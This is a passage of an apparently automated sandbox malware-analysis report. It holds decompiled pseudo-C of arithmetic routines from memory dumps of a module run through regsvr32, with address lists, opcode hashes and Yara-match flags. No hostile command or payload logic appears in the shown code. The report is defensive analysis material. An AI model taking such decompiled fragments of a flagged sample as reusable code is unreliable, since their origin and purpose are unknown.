				r10d =  *(_t193 + __rcx) & 0x0000ffff;
				r10d = r10d * ( *_t197 & 0x0000ffff);
				r11d = _t171 + _t193;
				if (r11d -  *(_t175 - 4) < 0) goto 0x2b07c237;
				if (r11d - r10d >= 0) goto 0x2b07c23a;
				 *(_t175 - 4) = r11d;
				if (r9d == 0) goto 0x2b07c246;
				 *_t175 =  *_t175 + r9w;
				r13d = r13d - r9d;
				if (r13d > 0) goto 0x2b07c217;
				r14d = 0;
				if (5 - r9d > 0) goto 0x2b07c1f9;
				r9d = _v88 & 0x0000ffff;
				r10d = _v64;
				r11d = _v72;
				r12d = 0xffff;
				r9w = r9w + 0xc002;
				if (r9w <= 0) goto 0x2b07c2ce;
				if ((0x80000000 & r10d) != 0) goto 0x2b07c2c8;
				r10d = r10d + r10d;
				r11d = r11d + r11d;
				r9w = r9w + r12w;
				r10d = r10d | _v68 >> 0x0000001f;
				_v72 = r11d;
				_v68 = __rdi + __rdi | r11d >> 0x0000001f;
				_v64 = r10d;
				if (r9w > 0) goto 0x2b07c292;
				_t160 = r9w;
				if (_t160 > 0) goto 0x2b07c33b;
				r9w = r9w + r12w;
				r13d = 1;
				if (_t160 >= 0) goto 0x2b07c341;
				r8d = _v84;
				r9w = r9w + ( ~(r9w & 0xffffffff) & 0x0000ffff);
				_t161 = _v72 & r13b;
				if (_t161 == 0) goto 0x2b07c2f5;
				r8d = r8d + r13d;
				_t129 = _v68;
				r11d = r11d >> 1;
				_t113 = _t129 << 0x1f;
				r10d = r10d >> 1;
				r11d = r11d | _t113;
				_v68 = _t129 >> 0x00000001 | r10d << 0x0000001f;
				_v72 = r11d;
				if (_t161 != 0) goto 0x2b07c2ec;
				_t191 = _v80;
				_v64 = r10d;
				if (r8d == 0) goto 0x2b07c341;
				_v72 = r11w & 0xffffffff | r13w;
				r11d = _v72;
				goto 0x2b07c345;
				r13d = 1;
				if ((_v72 & 0x0000ffff) - 0x8000 > 0) goto 0x2b07c363;
				r11d = r11d & 0x0001ffff;
				if (r11d != 0x18000) goto 0x2b07c3ac;
				_t114 = _t113 | 0xffffffff;
				if (_v70 != _t114) goto 0x2b07c3a6;
				_v70 = r14d;
				if (_v66 != _t114) goto 0x2b07c39a;
				_t94 = _v62 & 0x0000ffff;
				_v66 = r14d;
				if (_t94 != r12w) goto 0x2b07c390;
				_v62 = 0x8000;
				r9w = r9w + r13w;
				goto 0x2b07c3a0;
				_t95 = _t94 + r13w;
				_v62 = _t95;
				goto 0x2b07c3a0;
				_t96 = _t95 + r13d;
				_v66 = _t96;
				r10d = _v64;
				goto 0x2b07c3ac;
				_v70 = _t96 + r13d;
				if (r9w - 0x7fff < 0) goto 0x2b07c3c0;
				 *_t191 = 0;
				goto 0x2b07c3e6;
				r9w = r9w | _v86 & 0x0000ffff;
				 *(_t191 + 6) = r10d;
				 *_t191 = _v70 & 0x0000ffff;
				_t100 = _v68;
				 *(_t191 + 0xa) = r9w;
				 *(_t191 + 2) = _t100;
				goto 0x2b07c3f6;
				 *_t191 = _t197 - 2;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t191 + 8)) = (_t100 & 0x80000000) + 0x7fff8000;
				return E00007FFD7FFD2B064980(_t114, _v56 ^ _t187, __rdx - _t195, _t191);
			}

0x7ffd2b07c0e8
0x7ffd2b07c0ed
0x7ffd2b07c0f2
0x7ffd2b07c103
0x7ffd2b07c107
0x7ffd2b07c10e
0x7ffd2b07c111
0x7ffd2b07c115
0x7ffd2b07c119
0x7ffd2b07c11f
0x7ffd2b07c123
0x7ffd2b07c13d
0x7ffd2b07c141
0x7ffd2b07c144
0x7ffd2b07c147
0x7ffd2b07c14b
0x7ffd2b07c14f
0x7ffd2b07c153
0x7ffd2b07c157
0x7ffd2b07c15f
0x7ffd2b07c168
0x7ffd2b07c177
0x7ffd2b07c186
0x7ffd2b07c188
0x7ffd2b07c18c
0x7ffd2b07c18f
0x7ffd2b07c199
0x7ffd2b07c1a2
0x7ffd2b07c1a4
0x7ffd2b07c1a8
0x7ffd2b07c1b1
0x7ffd2b07c1b7
0x7ffd2b07c1bc
0x7ffd2b07c1be
0x7ffd2b07c1c3
0x7ffd2b07c1cb
0x7ffd2b07c1cd
0x7ffd2b07c1d1
0x7ffd2b07c1db
0x7ffd2b07c1e2
0x7ffd2b07c1e8
0x7ffd2b07c1ed
0x7ffd2b07c1ed
0x7ffd2b07c1fc
0x7ffd2b07c1ff
0x7ffd2b07c204
0x7ffd2b07c20c
0x7ffd2b07c214
0x7ffd2b07c21b
0x7ffd2b07c222
0x7ffd2b07c229
0x7ffd2b07c230
0x7ffd2b07c235
0x7ffd2b07c23a
0x7ffd2b07c240
0x7ffd2b07c242
0x7ffd2b07c246
0x7ffd2b07c254
0x7ffd2b07c25a
0x7ffd2b07c269
0x7ffd2b07c26b
0x7ffd2b07c270
0x7ffd2b07c274
0x7ffd2b07c282
0x7ffd2b07c288
0x7ffd2b07c290
0x7ffd2b07c295
0x7ffd2b07c29d
0x7ffd2b07c2a3
0x7ffd2b07c2ae
0x7ffd2b07c2b4
0x7ffd2b07c2b7
0x7ffd2b07c2bb
0x7ffd2b07c2be
0x7ffd2b07c2c6
0x7ffd2b07c2c8
0x7ffd2b07c2cc
0x7ffd2b07c2ce
0x7ffd2b07c2d2
0x7ffd2b07c2d8
0x7ffd2b07c2da
0x7ffd2b07c2e8
0x7ffd2b07c2ec
0x7ffd2b07c2f0
0x7ffd2b07c2f2
0x7ffd2b07c2f5
0x7ffd2b07c2fb
0x7ffd2b07c305
0x7ffd2b07c30a
0x7ffd2b07c30d
0x7ffd2b07c313
0x7ffd2b07c316
0x7ffd2b07c31a
0x7ffd2b07c31f
0x7ffd2b07c323
0x7ffd2b07c327
0x7ffd2b07c331
0x7ffd2b07c335
0x7ffd2b07c339
0x7ffd2b07c33b
0x7ffd2b07c351
0x7ffd2b07c353
0x7ffd2b07c361
0x7ffd2b07c366
0x7ffd2b07c36b
0x7ffd2b07c370
0x7ffd2b07c376
0x7ffd2b07c378
0x7ffd2b07c37c
0x7ffd2b07c384
0x7ffd2b07c386
0x7ffd2b07c38a
0x7ffd2b07c38e
0x7ffd2b07c390
0x7ffd2b07c394
0x7ffd2b07c398
0x7ffd2b07c39a
0x7ffd2b07c39d
0x7ffd2b07c3a0
0x7ffd2b07c3a4
0x7ffd2b07c3a9
0x7ffd2b07c3b5
0x7ffd2b07c3b7
0x7ffd2b07c3be
0x7ffd2b07c3c4
0x7ffd2b07c3c8
0x7ffd2b07c3cc
0x7ffd2b07c3d0
0x7ffd2b07c3d3
0x7ffd2b07c3d8
0x7ffd2b07c3dc
0x7ffd2b07c3e3
0x7ffd2b07c3e9
0x7ffd2b07c3f2
0x7ffd2b07c41e

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db52f5c95a03b0e6c900aa874dcf1f267d555641bbb2baf42ed015848d971db
Instruction ID: 062270c66e3eaedd1f3987f79d4ad33d86cebbb50904b0fbb5e367887e8bab68
Opcode Fuzzy Hash: 5db52f5c95a03b0e6c900aa874dcf1f267d555641bbb2baf42ed015848d971db
Instruction Fuzzy Hash: CB911537F296528BF7218F64CA1067E77B0FB16348F504036EE0963AA4DB7CA911E790

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025CB8 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e5a607cb4fab1c828942dee17bc3902e8d42f21f052dbabf23c70adef17431
Instruction ID: ce9a01cb25bcbe83c280eab41490dde06654ab5ba01acb8202d2f0351efd74c8
Opcode Fuzzy Hash: d1e5a607cb4fab1c828942dee17bc3902e8d42f21f052dbabf23c70adef17431
Instruction Fuzzy Hash: 18C164B5900308CFDB98DF68C18A58D7BB9FF59744F40412AFC1E9A2A4D7B4E525CB06

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07DBCC Relevance: .2, Instructions: 173
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD2B07DBCC(void* __edx, unsigned int __esi, long long __rbx, char* __rcx, void* __rdx, long long __rsi, long long __rbp, unsigned int* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				unsigned int _t52;
				unsigned int _t57;
				unsigned int _t83;
				unsigned int _t84;
				signed int _t85;
				void* _t107;
				unsigned long long _t117;
				void* _t124;
				void* _t128;

				_t128 = __r9;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				 *__r8 =  *__r8 & 0x00000000;
				__r8[1] = __r8[1] & 0x00000000;
				__r8[2] = __r8[2] & 0x00000000;
				if (__edx == 0) goto 0x2b07dd3f;
				r9d = 0;
				r10d = 0;
				_t8 = _t128 + 1; // 0x1
				r14d = _t8;
				_t117 =  *__r8;
				r12d = __r8[2];
				r9d = r9d + r9d;
				r10d = r10d + r10d;
				r10d = r10d | r9d >> 0x0000001f;
				r8d = _t117 + _t117;
				r10d = r10d + r10d;
				r9d = r9d | __esi >> 0x0000001f;
				r8d = r8d + r8d;
				r9d = r9d + r9d;
				 *(_t124 - 0x10) = _t117;
				r9d = r9d | r8d >> 0x0000001f;
				r10d = r10d | r9d >> 0x0000001f;
				 *__r8 = r8d;
				_t83 = __r8 + __rcx;
				__r8[1] = r9d;
				__r8[2] = r10d;
				if (_t83 - r8d < 0) goto 0x2b07dc6e;
				if (_t83 - __esi >= 0) goto 0x2b07dc71;
				 *__r8 = _t83;
				if (r14d == 0) goto 0x2b07dc9c;
				r9d = r9d + 1;
				if (r9d - r9d < 0) goto 0x2b07dc8a;
				if (r9d - r14d >= 0) goto 0x2b07dc8d;
				__r8[1] = r9d;
				if (r14d == 0) goto 0x2b07dc9c;
				r10d = r10d + 1;
				__r8[2] = r10d;
				r8d = __r9 + (_t117 >> 0x20);
				if (r8d - r9d < 0) goto 0x2b07dcb0;
				if (r8d - __esi >= 0) goto 0x2b07dcb3;
				__r8[1] = r8d;
				if (r14d == 0) goto 0x2b07dcc2;
				r10d = r10d + r14d;
				__r8[2] = r10d;
				r10d = r10d + r12d;
				_t84 = _t83 + _t83;
				r9d = __r8 + __r8;
				r9d = r9d | _t83 >> 0x0000001f;
				r10d = r10d + r10d;
				r10d = r10d | r8d >> 0x0000001f;
				__r8[1] = r9d;
				 *__r8 = _t84;
				__r8[2] = r10d;
				r8d =  *__rcx;
				_t52 = __rdx + __r8;
				if (_t52 - _t84 < 0) goto 0x2b07dcfe;
				if (_t52 - r8d >= 0) goto 0x2b07dd01;
				 *__r8 = _t52;
				if (r14d == 0) goto 0x2b07dd2c;
				r9d = r9d + 1;
				if (r9d - r9d < 0) goto 0x2b07dd1a;
				if (r9d - r14d >= 0) goto 0x2b07dd1d;
				__r8[1] = r9d;
				_t107 = r14d;
				if (_t107 == 0) goto 0x2b07dd2c;
				r10d = r10d + 1;
				__r8[2] = r10d;
				__r8[1] = r9d;
				__r8[2] = r10d;
				if (_t107 != 0) goto 0x2b07dc11;
				if (__r8[2] != 0) goto 0x2b07dd80;
				r9d = __r8[1];
				_t85 =  *__r8;
				r8d = r9d;
				r8d = r8d >> 0x10;
				__r8[2] = r8d;
				r9d = _t85 >> 0x10;
				 *__r8 = _t85 << 0x10;
				r9d = r9d | r9d << 0x00000010;
				__r8[1] = r9d;
				if (r8d == 0) goto 0x2b07dd4a;
				r8d = __r8[2];
				r10d = 0x8000;
				if ((r10d & r8d) != 0) goto 0x2b07ddc7;
				r9d = __r8[1];
				_t57 =  *__r8;
				r8d = r8d + r8d;
				r9d = r9d + r9d;
				r8d = r8d | r9d >> 0x0000001f;
				r9d = r9d | _t57 >> 0x0000001f;
				 *__r8 = _t57 + _t57;
				__r8[1] = r9d;
				__r8[2] = r8d;
				if ((r10d & r8d) == 0) goto 0x2b07dd93;
				__r8[2] = 0x2403d;
				return 0xffff;
			}

0x7ffd2b07dbcc
0x7ffd2b07dbcc
0x7ffd2b07dbd1
0x7ffd2b07dbd6
0x7ffd2b07dbe4
0x7ffd2b07dbe8
0x7ffd2b07dbed
0x7ffd2b07dc01
0x7ffd2b07dc07
0x7ffd2b07dc0a
0x7ffd2b07dc0d
0x7ffd2b07dc0d
0x7ffd2b07dc11
0x7ffd2b07dc14
0x7ffd2b07dc1b
0x7ffd2b07dc1e
0x7ffd2b07dc24
0x7ffd2b07dc27
0x7ffd2b07dc30
0x7ffd2b07dc36
0x7ffd2b07dc39
0x7ffd2b07dc42
0x7ffd2b07dc45
0x7ffd2b07dc4c
0x7ffd2b07dc51
0x7ffd2b07dc56
0x7ffd2b07dc59
0x7ffd2b07dc5d
0x7ffd2b07dc61
0x7ffd2b07dc68
0x7ffd2b07dc6c
0x7ffd2b07dc71
0x7ffd2b07dc76
0x7ffd2b07dc7b
0x7ffd2b07dc83
0x7ffd2b07dc88
0x7ffd2b07dc8d
0x7ffd2b07dc93
0x7ffd2b07dc95
0x7ffd2b07dc98
0x7ffd2b07dca2
0x7ffd2b07dca9
0x7ffd2b07dcae
0x7ffd2b07dcb3
0x7ffd2b07dcb9
0x7ffd2b07dcbb
0x7ffd2b07dcbe
0x7ffd2b07dcc2
0x7ffd2b07dcc7
0x7ffd2b07dccf
0x7ffd2b07dcd6
0x7ffd2b07dcd9
0x7ffd2b07dcdc
0x7ffd2b07dcdf
0x7ffd2b07dce3
0x7ffd2b07dce6
0x7ffd2b07dcea
0x7ffd2b07dcf1
0x7ffd2b07dcf7
0x7ffd2b07dcfc
0x7ffd2b07dd01
0x7ffd2b07dd06
0x7ffd2b07dd0b
0x7ffd2b07dd13
0x7ffd2b07dd18
0x7ffd2b07dd1d
0x7ffd2b07dd21
0x7ffd2b07dd23
0x7ffd2b07dd25
0x7ffd2b07dd28
0x7ffd2b07dd31
0x7ffd2b07dd35
0x7ffd2b07dd39
0x7ffd2b07dd44
0x7ffd2b07dd46
0x7ffd2b07dd4a
0x7ffd2b07dd50
0x7ffd2b07dd58
0x7ffd2b07dd62
0x7ffd2b07dd66
0x7ffd2b07dd69
0x7ffd2b07dd6c
0x7ffd2b07dd77
0x7ffd2b07dd7e
0x7ffd2b07dd80
0x7ffd2b07dd84
0x7ffd2b07dd8d
0x7ffd2b07dd8f
0x7ffd2b07dd93
0x7ffd2b07dd99
0x7ffd2b07dda6
0x7ffd2b07dda9
0x7ffd2b07ddac
0x7ffd2b07ddaf
0x7ffd2b07ddba
0x7ffd2b07ddbe
0x7ffd2b07ddc5
0x7ffd2b07ddd1
0x7ffd2b07dde4

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction ID: 857edd52b07768329012149e65272ae97f2807bc2b66d9f5235d95a418b3c0c3
Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
Instruction Fuzzy Hash: 425148B2F192A28BE7198F18E518F6C7694F754381F11D138DB1687F90DABADC40EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800197F8 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b60171dc45b79a64648eede91aa010a9deb81f01e779db23a0f33eba1251872
Instruction ID: 1bb92d0f227b8f601480388a2d58d6ea08c0bd89027e7906522efa61ba5df313
Opcode Fuzzy Hash: 1b60171dc45b79a64648eede91aa010a9deb81f01e779db23a0f33eba1251872
Instruction Fuzzy Hash: 2881F77154878C9BEBBACF64D8897D937B0FB09344F908229D80E9E290DF745B89DB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007658 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fce1a3257b5a05a119cec6670cbee55d8817af48b7f2a030da6d074f45caf57
Instruction ID: 4a1aaf2e863724a9d6375048e1fc417388e58e77765aece36950eef269fab687
Opcode Fuzzy Hash: 3fce1a3257b5a05a119cec6670cbee55d8817af48b7f2a030da6d074f45caf57
Instruction Fuzzy Hash: 2C919AB550234DCFDB58CF28C29A59D3BE0FF54308F404129FC5A9A2A4D7B8D629CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800138F0 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e783b5e3b40750ff3558cdff26548b2d6ff6e0bc7322d5cc93778d142798f73
Instruction ID: 5a36ab87df37d72e6517729777d4d1e32353e12cc4a4e6535100078dc38a5f3a
Opcode Fuzzy Hash: 9e783b5e3b40750ff3558cdff26548b2d6ff6e0bc7322d5cc93778d142798f73
Instruction Fuzzy Hash: A971187050064E8BDF48CF68C49A2DE3FB1FB58398F254219FC4AAA290D778D694CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001BB98 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd91713c7f3ae684498e4da5220245a4a86c3150db6b50624599d0c02ead068
Instruction ID: e906469827bf169e063eeb2975e3beda6a174f65c5d87a2cd426234b00c2ad56
Opcode Fuzzy Hash: 9dd91713c7f3ae684498e4da5220245a4a86c3150db6b50624599d0c02ead068
Instruction Fuzzy Hash: 2D51687861660CCBDB69CF28C4D56993BE4EF68304F20412DF866872A2DB74D925CB88

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002B6AC Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5cb32bfdc82ffefe67ac166da6a4fdf9a731d78aba7ebb784195a22a17b381f
Instruction ID: 6ee23df931dce464e4fe11490ca18f9892bf014009be1bfb4d04ba989e4cce53
Opcode Fuzzy Hash: e5cb32bfdc82ffefe67ac166da6a4fdf9a731d78aba7ebb784195a22a17b381f
Instruction Fuzzy Hash: 82711570D0475C8BEBA9DFE4D88669DBBB0FF44304F104219D419EB295D7B4AA4ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016C70 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2dbe5822058f962f2f58ea1d11b69701a4f8bb347ffca70b9a45be13ac6d1f3
Instruction ID: 1c1ab28b645e3098e9dea95bed53f1ded7810f4d756f74f9e7928d5f69cdaaa7
Opcode Fuzzy Hash: b2dbe5822058f962f2f58ea1d11b69701a4f8bb347ffca70b9a45be13ac6d1f3
Instruction Fuzzy Hash: 6D71C27154878DCBEBBACF24C8897DA7BB0FB48304F904619D84E8A2A0DF745749DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800278D8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933375d79356a5949fd7d4d81705efd8e887f23c277a49a56c4aed68a9df7030
Instruction ID: a13c45715b23b7bb3dffd35bbf57bffe77eb50cbb9881eb01665d399edbc5671
Opcode Fuzzy Hash: 933375d79356a5949fd7d4d81705efd8e887f23c277a49a56c4aed68a9df7030
Instruction Fuzzy Hash: FA51D5B190074ECFDB48CF68D88A5DE7FB0FB68398F104219E856A6250D7B496A5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013468 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2e25ab73f036ab1f86c11415023f90bb19440803f683ce5313aaf47e03009d
Instruction ID: 298e035927da68768de15cc1885f87aa77a9636fda3cfbded06a5eca01a142e6
Opcode Fuzzy Hash: cb2e25ab73f036ab1f86c11415023f90bb19440803f683ce5313aaf47e03009d
Instruction Fuzzy Hash: 1151C6B090078A8FDF48CF64C88A4DE7BB1FB58358F11461DEC26AB290D3B49664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029F58 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692fc913e48dd0fe6a9e40e9b491624281b227042648c739c59f497c3f58c609
Instruction ID: f4898256a3dd464b90f0d9625e24765d6b65505f01e3e1572b94dca47ee7b07d
Opcode Fuzzy Hash: 692fc913e48dd0fe6a9e40e9b491624281b227042648c739c59f497c3f58c609
Instruction Fuzzy Hash: 2351D4B190070E8BDF48CF64C48A4DE7FB1FB68398F104619E855AA290D774D6A5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003E2C Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe8ee57a286e067da43c9dc7ea69928666c4e3e73b081c201f5d4848503ce77
Instruction ID: 6481695fc7842e8413ed9be041f93bea59012a25fae32a8f7786dc5e2a88f693
Opcode Fuzzy Hash: 6fe8ee57a286e067da43c9dc7ea69928666c4e3e73b081c201f5d4848503ce77
Instruction Fuzzy Hash: D73191B0A0478A8FDB48CF68D8495AE3BA1FB48304F014A19FC669B350D7B49A64CF94

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C334 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d3fede260ce1586dc1fd582625f586afe9c81c978c00292da0007e095d2742
Instruction ID: eb1f12b259a80d7095d10e5800bf9173f3d4411df1abdbf8766c7a421c13ce81
Opcode Fuzzy Hash: 96d3fede260ce1586dc1fd582625f586afe9c81c978c00292da0007e095d2742
Instruction Fuzzy Hash: E44193B190038ECFDF58CF64C88A4DE7BB0FB14358F114A19E86996250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008BFC Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11089d9c8f39ef482f174284df1486cce58b3c7e841a064580ad6b12562224be
Instruction ID: a53ab7596d7507cf15f746e5dd34be472238625d89698240ee45d56577c16704
Opcode Fuzzy Hash: 11089d9c8f39ef482f174284df1486cce58b3c7e841a064580ad6b12562224be
Instruction Fuzzy Hash: 80317FB4529381AFD388DF19D49991ABBE1FBC9304F80AA2DF8C58B354D774D849CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001560 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf1c85fe9a0d420d45db198a1145ddf308eb25d6d5a7262cb662565bf41b19e
Instruction ID: 2e6594124d6e5483a51def63e01f6be68389ec9893121a8a6db93d92a6c9905a
Opcode Fuzzy Hash: baf1c85fe9a0d420d45db198a1145ddf308eb25d6d5a7262cb662565bf41b19e
Instruction Fuzzy Hash: 5831E5B090074E8BDF48CF64C88A4DEBBB0FB58348F10461DE856AA290D7B89695CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FA60 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48447c03218eaf706d52c73b9e6161ada3d45fe92dc331461933a2bd30f9ea1a
Instruction ID: 89f1aea0d261bddd19d6636035a1dfb963cce48ce123460c8f61b047169de7cb
Opcode Fuzzy Hash: 48447c03218eaf706d52c73b9e6161ada3d45fe92dc331461933a2bd30f9ea1a
Instruction Fuzzy Hash: 3131C570518B848FE378CF34C48679ABBE0FB84349F604A1DE5DE862A1DB799549CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013B6C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d0bc83decb1ad418ed8f3027fb4d453251688ca1c5686f90f413c9ceb8d8e6
